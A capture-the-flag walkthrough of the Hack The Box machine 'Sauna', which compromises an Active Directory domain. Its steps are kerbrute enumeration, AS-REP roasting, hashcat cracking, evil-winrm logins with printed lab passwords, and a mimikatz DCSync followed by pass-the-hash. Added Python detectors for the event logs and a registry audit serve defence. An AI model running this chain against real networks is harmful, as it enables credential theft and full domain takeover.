Sauna

Starting off with nmap

nmap -sC -sV -oA nmap/ -T4 10.129.171.194
# Nmap 7.93 scan initiated Sat Feb  4 19:57:04 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.171.194
Nmap scan report for 10.129.171.194
Host is up (0.052s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-02-05 00:57:17Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-time: 
|   date: 2023-02-05T00:57:22
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb  4 19:58:00 2023 -- 1 IP address (1 host up) scanned in 55.31 seconds

The results tell us a lot: there is a web site on port 80, and ports 53, 88, 389 and 445 (DNS, Kerberos, LDAP, SMB) mean we are dealing with an Active Directory domain controller. The LDAP banner also gives us the domain, EGOTISTICAL-BANK.LOCAL (the trailing "0." in nmap's output is not part of the name). Let's add that to our hosts file just in case:

127.0.0.1       localhost
127.0.1.1       joonas-VirtualBox

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.129.138.100  eforenzics.htb
10.129.171.194  EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL0

The web page has an about page with some members of the team.

[screenshot: about-page]

Nothing groundbreaking, but some of these people could have accounts in the domain. Let's build a simple wordlist from them. Common naming schemes are firstname.lastname, the first initial followed by a dot and the last name, or the first initial followed directly by the last name, so the wordlist could look like this:

fergus.smith
f.smith
fsmith
shaun.cois
s.cois
scois
hugo.bear
h.bear
hbear
bowie.taylor
b.taylor
btaylor
sophie.driver
s.driver
sdriver
steven.kerb
s.kerb
skerb

Let's save that to a file called users.txt and use kerbrute to check whether any of them are valid domain users:

kerbrute userenum -d EGOTISTICAL-BANK.LOCAL users.txt  --dc 10.129.171.194

We got one user!

[screenshot: kerbrute-results]

Next, let's use Impacket to check whether that user is AS-REP roastable, i.e. has Kerberos pre-authentication disabled (GetNPUsers.py does exactly this; Kerberoasting proper targets accounts with SPNs and is a separate check). First, create a file called user.txt containing just fsmith, then run:

GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.171.194 -usersfile user.txt -format hashcat -outputfile hashes.txt

We get a hash!

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b5bb182b0566624d92c2dc3730913e83$[remainder of hash truncated]

This can be cracked with hashcat (mode 18200, Kerberos 5 AS-REP etype 23; hashcat 6 and later also autodetects it from the $krb5asrep$23$ prefix). The hash file is the one GetNPUsers.py wrote above:

.\hashcat.exe -m 18200 .\hashes.txt .\rockyou.txt

We get the password 'Thestrokes23'. Now we can log in to the server with evil-winrm:

evil-winrm -u fsmith -p Thestrokes23 -i 10.129.171.194
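The two Kerberos steps just used (username enumeration with kerbrute, then AS-REP roasting with GetNPUsers.py) both leave a distinctive footprint in Event ID 4768 (a Kerberos authentication ticket was requested) on the domain controller. The following is an added example for this write-up, not code from the original post or from either tool: the event records are constructed, the field names follow the 4768 event schema, and the alert threshold is an assumption to tune per environment.

```python
"""Spot Kerberos username enumeration and AS-REP roasting in Windows
Security Event ID 4768 records.

Added example for the Sauna write-up; the events below are constructed.
"""
from collections import defaultdict

# 4768 Result Code, Pre-Authentication Type and Ticket Encryption Type values
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # requested user does not exist
KDC_SUCCESS = "0x0"
PREAUTH_NONE = "0"                    # TGT issued without pre-authentication
ETYPE_RC4_HMAC = "0x17"               # etype 23, the $krb5asrep$23$ hash format
ETYPE_NONE = "0xffffffff"             # failures carry no ticket etype

ENUM_THRESHOLD = 5  # distinct unknown usernames from one source (assumption)

# Constructed sample: a kerbrute-style burst from 10.0.0.50, one typo from a
# legitimate client, then a pre-auth-less RC4 TGT for fsmith from 10.0.0.50.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": n, "IpAddress": "::ffff:10.0.0.50",
     "Status": KDC_ERR_C_PRINCIPAL_UNKNOWN, "PreAuthType": "-",
     "TicketEncryptionType": ETYPE_NONE}
    for n in ("fergus.smith", "f.smith", "shaun.cois", "s.cois", "scois", "hbear")
] + [
    {"EventID": 4768, "TargetUserName": "jsmtih", "IpAddress": "::ffff:10.0.0.20",
     "Status": KDC_ERR_C_PRINCIPAL_UNKNOWN, "PreAuthType": "-",
     "TicketEncryptionType": ETYPE_NONE},
    {"EventID": 4768, "TargetUserName": "jsmith", "IpAddress": "::ffff:10.0.0.20",
     "Status": KDC_SUCCESS, "PreAuthType": "2",   # PA-ENC-TIMESTAMP: normal logon
     "TicketEncryptionType": "0x12"},             # AES256
    {"EventID": 4768, "TargetUserName": "fsmith", "IpAddress": "::ffff:10.0.0.50",
     "Status": KDC_SUCCESS, "PreAuthType": PREAUTH_NONE,
     "TicketEncryptionType": ETYPE_RC4_HMAC},
]


def detect_username_enumeration(events, threshold=ENUM_THRESHOLD):
    """Return {source_ip: [unknown usernames]} for sources that asked the KDC
    about at least `threshold` distinct non-existent accounts."""
    unknown = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: sorted(names) for ip, names in unknown.items()
            if len(names) >= threshold}


def detect_asrep_roast(events):
    """Return (source_ip, user) for successful TGT requests that used no
    pre-authentication and received an RC4 ticket: the exact shape behind a
    $krb5asrep$23$ hash."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["EventID"] == 4768 and e["Status"] == KDC_SUCCESS
            and e["PreAuthType"] == PREAUTH_NONE
            and e["TicketEncryptionType"] == ETYPE_RC4_HMAC]


if __name__ == "__main__":
    for ip, names in detect_username_enumeration(SAMPLE_EVENTS).items():
        print(f"username enumeration from {ip}: {len(names)} unknown names, e.g. {names[:3]}")
    for ip, user in detect_asrep_roast(SAMPLE_EVENTS):
        print(f"AS-REP roast candidate: {user} requested from {ip} without pre-auth (RC4)")
```

The fix on the directory side is to clear "Do not require Kerberos preauthentication" on every account that does not strictly need it and to stop issuing RC4 tickets; the detection above then degrades gracefully, because a single PreAuthType 0 success becomes an alert in its own right rather than noise.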

Running winPEAS reveals AutoLogon credentials stored in the registry:

[screenshot: winpeas]

Interestingly, there is no user called svc_loanmanager on the server, but svc_loanmgr exists. We can log in with those credentials via evil-winrm:

evil-winrm -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.129.171.194
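What winPEAS found is the Winlogon AutoLogon configuration: the DefaultUserName and DefaultPassword values under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, a key every local user can read. The following is an added example for this write-up, not code from the original post or from winPEAS: it audits a .reg export of that key and produces the fix. The export text is constructed; the key path and value names (AutoAdminLogon, DefaultUserName, DefaultDomainName, DefaultPassword) are the real Winlogon ones.

```python
"""Audit Winlogon AutoLogon values from a .reg export and emit a fix.

Added example for the Sauna write-up; the .reg text below is constructed.
"""
import re

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed export with the same shape of misconfiguration as the box:
# AutoLogon switched on and the account password stored as a clear-text
# string in a key every local user can read.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
"DefaultDomainName"="EXAMPLEBANK"
"DefaultUserName"="svc_example"
"DefaultPassword"="ConstructedPassw0rd!"
"ForceAutoLogon"="0"
'''

VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text):
    """Return {key_path: {value_name: data}} for a .reg export. String data is
    unquoted, dword data is kept as 'dword:xxxxxxxx', a '-' (delete) is None."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None:
            m = VALUE_RE.match(line)
            if not m:
                continue
            name, data = m.groups()
            if data == "-":
                keys[current][name] = None
            elif len(data) >= 2 and data[0] == data[-1] == '"':
                keys[current][name] = data[1:-1]
            else:
                keys[current][name] = data
    return keys


def audit_autologon(keys):
    """Return (severity, message) findings for the Winlogon key."""
    values = keys.get(WINLOGON_KEY, {})
    enabled = values.get("AutoAdminLogon") in ("1", "dword:00000001")
    password = values.get("DefaultPassword")
    account = values.get("DefaultDomainName", ".") + "\\" + values.get("DefaultUserName", "<unset>")
    findings = []
    if password:
        findings.append(("high", "DefaultPassword for " + account + " is stored in clear text; "
                                 "the Winlogon key is readable by every local user"))
    if enabled:
        findings.append(("medium", "AutoAdminLogon is enabled for " + account + "; "
                                   "anyone at the console gets that session"))
        if not password:
            findings.append(("info", "no DefaultPassword value: the password lives in the "
                                     "LSA DefaultPassword secret, which local administrators can still read"))
    return findings


def remediation_reg(keys):
    """Emit a .reg fragment that disables AutoLogon and deletes the clear-text
    password ('"name"=-' is the .reg syntax for deleting a value)."""
    values = keys.get(WINLOGON_KEY, {})
    lines = ["Windows Registry Editor Version 5.00", "", "[" + WINLOGON_KEY + "]"]
    if values.get("AutoAdminLogon") not in (None, "0"):
        lines.append('"AutoAdminLogon"="0"')
    if values.get("DefaultPassword") is not None:
        lines.append('"DefaultPassword"=-')
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    parsed = parse_reg(SAMPLE_REG)
    for severity, message in audit_autologon(parsed):
        print("[" + severity + "] " + message)
    print(remediation_reg(parsed))
```

Where AutoLogon genuinely has to stay (kiosks, signage), the password should at least not be a domain account with rights elsewhere; the mismatch the box shows, a stored username that differs from the real account name, is a reminder that these values outlive the accounts they were set up for and should be part of a periodic credential-hygiene check.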

Next, let's use BloodHound to enumerate further. Upload SharpHound to the server and run it:

upload SharpHound.exe
....
./SharpHound.exe

BloodHound now reveals something nice:

[screenshot: bloodhound]

In short, svc_loanmgr holds replication rights over the domain, so we can run a DCSync attack and pull hashes with mimikatz or a similar tool. Let's try that out: upload mimikatz and run it:

upload mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit

[screenshot: mimikatz]

We got the Administrator's NTLM hash! With evil-winrm's -H option we can pass the hash and log in as Administrator:

evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.129.171.194
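The DCSync step above is a directory replication request, and a domain controller with "Audit Directory Service Access" enabled records it as Event ID 4662 with the replication extended rights in the Properties field. The following is an added example for this write-up, not code from the original post or from BloodHound or mimikatz: it flags 4662 events in which a principal outside an allow-list exercised those rights. The events are constructed (the domain and account names come from the write-up, everything else is made up); the extended-right and object-class GUIDs are the real Active Directory schema values, and the allow-list of accounts expected to replicate is an assumption for the sample.

```python
"""Detect DCSync-style replication requests in Windows Security Event ID
4662 records from a domain controller.

Added example for the Sauna write-up; the events below are constructed.
"""
import re

# Extended rights a DCSync needs; BloodHound draws them as GetChanges and
# GetChangesAll edges from the principal to the domain object.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # domainDNS object class
USER_CLASS = "bf967aba-0de6-11d0-a285-00aa003049e2"        # user object class
CONTROL_ACCESS = "0x100"  # 4662 AccessMask when an extended right is exercised
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")


def _event(user, obj_class, mask, *props):
    """Build a minimal 4662 record in the shape the Security log uses."""
    return {"EventID": 4662, "SubjectUserName": user,
            "SubjectDomainName": "EGOTISTICALBANK",
            "ObjectType": "%{" + obj_class + "}", "AccessMask": mask,
            "Properties": "\n".join("{" + p + "}" for p in props)}


# Constructed sample events.
SAMPLE_EVENTS = [
    # the DC replicating with a peer through its machine account: expected
    _event("SAUNA$", DOMAIN_DNS_CLASS, CONTROL_ACCESS,
           "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
           "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", DOMAIN_DNS_CLASS),
    # a user account pulling the full replication stream: DCSync
    _event("svc_loanmgr", DOMAIN_DNS_CLASS, CONTROL_ACCESS,
           "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
           "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", DOMAIN_DNS_CLASS),
    # the same account reading an attribute of a user object: ordinary access
    _event("svc_loanmgr", USER_CLASS, "0x10",
           "bf967a68-0de6-11d0-a285-00aa003049e2", USER_CLASS),
]


def detect_dcsync(events, allowlist=frozenset({"sauna$"})):
    """Return one record per 4662 event in which a principal outside the
    allow-list (assumed: the DC machine accounts, plus any directory-sync
    service accounts) exercised a replication extended right."""
    hits = []
    for e in events:
        if e["EventID"] != 4662 or e["AccessMask"].lower() != CONTROL_ACCESS:
            continue
        rights = [REPLICATION_RIGHTS[g]
                  for g in GUID_RE.findall(e["Properties"].lower())
                  if g in REPLICATION_RIGHTS]
        if not rights or e["SubjectUserName"].lower() in allowlist:
            continue
        hits.append({"user": e["SubjectDomainName"] + "\\" + e["SubjectUserName"],
                     "rights": rights})
    return hits


if __name__ == "__main__":
    for hit in detect_dcsync(SAMPLE_EVENTS):
        print("possible DCSync by " + hit["user"] + ": " + ", ".join(hit["rights"]))
```

Get-Changes-All is the right that actually releases password hashes, so a tighter rule can key on that GUID alone; but the preventive control is the one BloodHound already pointed at: list every principal holding these rights on the domain object and strip them from anything that is not a domain controller or a known directory-sync account.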

GGs